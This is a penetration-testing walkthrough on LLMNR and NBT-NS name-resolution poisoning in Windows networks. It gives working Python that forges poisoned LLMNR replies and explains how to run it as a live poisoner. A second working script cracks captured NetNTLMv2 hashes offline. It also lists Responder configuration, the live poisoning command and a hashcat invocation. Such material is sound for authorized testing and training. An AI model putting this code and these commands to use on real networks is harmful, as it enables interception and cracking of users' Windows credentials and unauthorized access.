Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are the name-resolution fallbacks built into Microsoft Windows. When DNS cannot resolve a name (a mistyped share path, a stale drive mapping, a host that no longer exists), the machine asks the other hosts on its local segment whether any of them owns that name, and trusts whoever answers.
LLMNR (RFC 4795) uses UDP port 5355 and reuses the DNS packet format. The querying host sends its question to the multicast group 224.0.0.252 (ff02::1:3 for IPv6), and any host on the segment that believes it owns the name replies directly to the querier. Nothing in the protocol authenticates the answer.
If LLMNR produces no answer, the system falls back to NBT-NS. NBT-NS uses UDP port 137 and resolves NetBIOS names by broadcasting the query to the whole subnet. It is the older of the two mechanisms, kept in Windows for compatibility with legacy NetBIOS-over-TCP/IP networking, and it is equally unauthenticated.
With a foothold on the network, anyone in the same broadcast domain can answer these queries. By replying to LLMNR and NBT-NS requests with falsified answers, a rogue host convinces the requester that it is the machine being looked for, and the requester connects to it instead.
This poisoning redirects the victim's connection to our system, where we can intercept the authentication that follows. For SMB, HTTP and similar services the client authenticates with NTLM, so we obtain its NetNTLMv1 or NetNTLMv2 challenge-response (commonly called a "NetNTLM hash"). That capture can be attacked offline by dictionary or brute force to recover the plaintext password (hashcat mode 5600 for NetNTLMv2, 5500 for NetNTLMv1). Alternatively, the authentication can be relayed in real time to another host, or to a different protocol on the same host such as LDAP, wherever SMB signing, LDAP signing or channel binding is not enforced. Note that a NetNTLMv2 response is bound to a server challenge and cannot be replayed later as in pass-the-hash; cracking or live relay are the only ways to use it.
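The following Python shows the packet-level mechanism described above. It is an added example written for this page, not code from Responder or any other tool: it builds an LLMNR A query the way a Windows host would send it, parses it, and crafts the poisoned reply an attacker would unicast back to the querier. The host name, transaction ID and attacker address are constructed sample values.

```python
import socket
import struct

# RFC 4795 constants: queries go to this multicast group on UDP 5355;
# responses are unicast back to the querier's source address and port.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1
FLAG_QR = 0x8000  # response bit in the 16-bit flags word (same layout as DNS)


def encode_name(name: str) -> bytes:
    """DNS wire format: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(buf: bytes, off: int):
    """Decode labels at `off`; follows a compression pointer (0xC0xx) if present.
    Returns (name, offset just past the name as it appeared at `off`)."""
    labels, end = [], None
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:                 # pointer: jump, remember where we were
            if end is None:
                end = off + 2
            off = ((length & 0x3F) << 8) | buf[off + 1]
            continue
        off += 1
        if length == 0:
            break
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What the victim multicasts after DNS fails: flags 0, one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(buf: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    if flags & FLAG_QR or qd != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(buf, 12)
    qtype, qclass = struct.unpack("!HH", buf[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Answer the victim's own question with the attacker's address.
    The transaction ID and question are echoed so the victim accepts the
    answer; nothing in LLMNR checks who answered."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["txid"], FLAG_QR, 1, 1, 0, 0)
    question = encode_name(q["name"]) + struct.pack("!HH", q["qtype"], q["qclass"])
    answer = (b"\xC0\x0C"                          # pointer to the name at offset 12
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_response(buf: bytes) -> dict:
    """What the victim's resolver sees; it will connect to answers[0]['ip']."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    if not flags & FLAG_QR:
        raise ValueError("not a response")
    name, off = decode_name(buf, 12)
    off += 4                                       # skip QTYPE/QCLASS
    answers = []
    for _ in range(an):
        aname, off = decode_name(buf, off)
        rtype, rclass, rttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata, off = buf[off:off + rdlen], off + rdlen
        ip = socket.inet_ntoa(rdata) if rtype == QTYPE_A and rdlen == 4 else None
        answers.append({"name": aname, "type": rtype, "ttl": rttl, "ip": ip})
    return {"txid": txid, "name": name, "answers": answers}


if __name__ == "__main__":
    # Constructed sample: a host mistyped \\fileserver01, DNS failed, and it
    # multicasts an LLMNR A query; the attacker at 10.0.0.5 answers it.
    victim_query = build_query(0x1234, "fileserver01")
    print("victim asks:", parse_query(victim_query))
    poisoned = build_poisoned_response(victim_query, "10.0.0.5")
    print("victim receives:", parse_response(poisoned))
```

To turn this into a live poisoner you would bind UDP 5355, join 224.0.0.252 on the target interface, and unicast `build_poisoned_response()` to the source address and port of every A/AAAA query you receive; Responder does exactly that, and the same trick against NBT-NS on UDP 137 with the NetBIOS name format. Note that Windows hosts issue an AAAA query alongside the A query, and that the spoofed TTL only needs to outlive the victim's connection attempt.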
Several tools can perform this attack; the walkthrough below uses Responder.
Before starting Responder, locate Responder.conf, which on Kali lives in /usr/share/responder (in a git checkout it sits next to Responder.py). Under [Responder Core], confirm that SMB = On, and HTTP = On if you also want to catch web-based authentication prompts. If you have previously turned these servers off to hand connections to a relay tool such as ntlmrelayx, they will still be off and nothing will be captured.
Responder prints results to the screen and also logs them per host in the /usr/share/responder/logs directory, one file per module, hash type and client, named (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt (for example SMB-NTLMv2-SSP-192.168.1.20.txt); the session log Responder-Session.log in the same directory records everything it saw. Only one hash per host is printed to the console and stored in its log file unless verbose (-v) mode is enabled, which prints every capture.
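What happens to a capture after Responder writes it to its log file: the following Python is an added example (not Responder's own code) that parses a NetNTLMv2 line in the format stored in the logs directory, which is the same format hashcat mode 5600 consumes, and tests candidate passwords against it offline by recomputing the NTLMv2 proof exactly as MS-NLMP specifies (NT hash = MD4 of the UTF-16LE password, NTOWFv2 = HMAC-MD5 over uppercase user plus domain, NTProofStr = HMAC-MD5 over server challenge plus blob). The user, domain, challenges, timestamp and password are constructed sample values, and the sample line is generated by the script itself rather than taken from a real capture. A pure-Python MD4 is included because OpenSSL 3 builds often ship hashlib without it.

```python
import hashlib
import hmac
import struct


def _md4_pure(data: bytes) -> bytes:
    """RFC 1320 MD4, used when hashlib has no md4 (OpenSSL 3 legacy provider missing)."""
    M = 0xFFFFFFFF
    def rotl(x, n):
        x &= M
        return ((x << n) | (x >> (32 - n))) & M
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                                   # round 1
            a = rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl(a + G(b, c, d) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl(a + H(b, c, d) + X[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & M for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def md4(data: bytes) -> bytes:
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:                                        # md4 unsupported
        return _md4_pure(data)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the client computes it (MS-NLMP 3.3.2)."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()


def parse_netntlmv2(line: str) -> dict:
    """Responder log / hashcat -m 5600 format: USER::DOMAIN:serverchallenge:NTProofStr:blob."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a NetNTLMv2 line")
    user, _, domain, chal, proof, blob = parts
    chal_b, proof_b, blob_b = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    # 8-byte server challenge, 16-byte HMAC-MD5, blob starts with RespType/HiRespType 0x0101 + reserved
    if len(chal_b) != 8 or len(proof_b) != 16 or not blob_b.startswith(b"\x01\x01\x00\x00\x00\x00\x00\x00"):
        raise ValueError("malformed NetNTLMv2 fields")
    return {"user": user, "domain": domain, "challenge": chal_b, "proof": proof_b, "blob": blob_b}


def crack_netntlmv2(line: str, candidates):
    """Offline dictionary attack: recompute the proof for each candidate; return the match or None."""
    h = parse_netntlmv2(line)
    for pw in candidates:
        guess = ntlmv2_proof(pw, h["user"], h["domain"], h["challenge"], h["blob"])
        if hmac.compare_digest(guess, h["proof"]):
            return pw
    return None


def build_sample_capture(password: str, user: str = "jdoe", domain: str = "CORP") -> str:
    """Constructed sample line in Responder's on-disk format. Fixed server challenge,
    timestamp and client challenge keep it reproducible; real captures have random values."""
    server_challenge = bytes.fromhex("1122334455667788")
    timestamp = struct.pack("<Q", 0x01DA6F2A3B4C5D6E)          # arbitrary FILETIME
    client_challenge = bytes.fromhex("a1b2c3d4e5f60718")
    av_pairs = struct.pack("<HH", 2, 8) + domain.encode("utf-16-le") + struct.pack("<HH", 0, 0)
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + timestamp + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    captured = build_sample_capture("Summer2024!")
    print("as logged by Responder:", captured)
    print("recovered:", crack_netntlmv2(captured, ["Winter2023", "Summer2024!", "P@ssw0rd"]))
```

The same line can be fed unchanged to hashcat (`hashcat -m 5600 <file> <wordlist>`), which is what you would do for anything beyond a handful of candidates; the point of recomputing the proof here is to see why the capture is only useful against that one server challenge, and why the username and domain in the line matter (they are part of the keyed input, so a line with the wrong case or domain will never crack).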
After configuring the settings, execute the command
sudo responder -I $Interface -v
This starts poisoning LLMNR and NBT-NS responses (recent versions also answer mDNS) and prints captured hashes as they arrive. Running Responder with the -A flag (analyze mode) instead only listens and reports which hosts are issuing LLMNR, NBT-NS and Browser requests, without poisoning anything; this is a quiet way to confirm the segment is vulnerable before sending a single spoofed reply.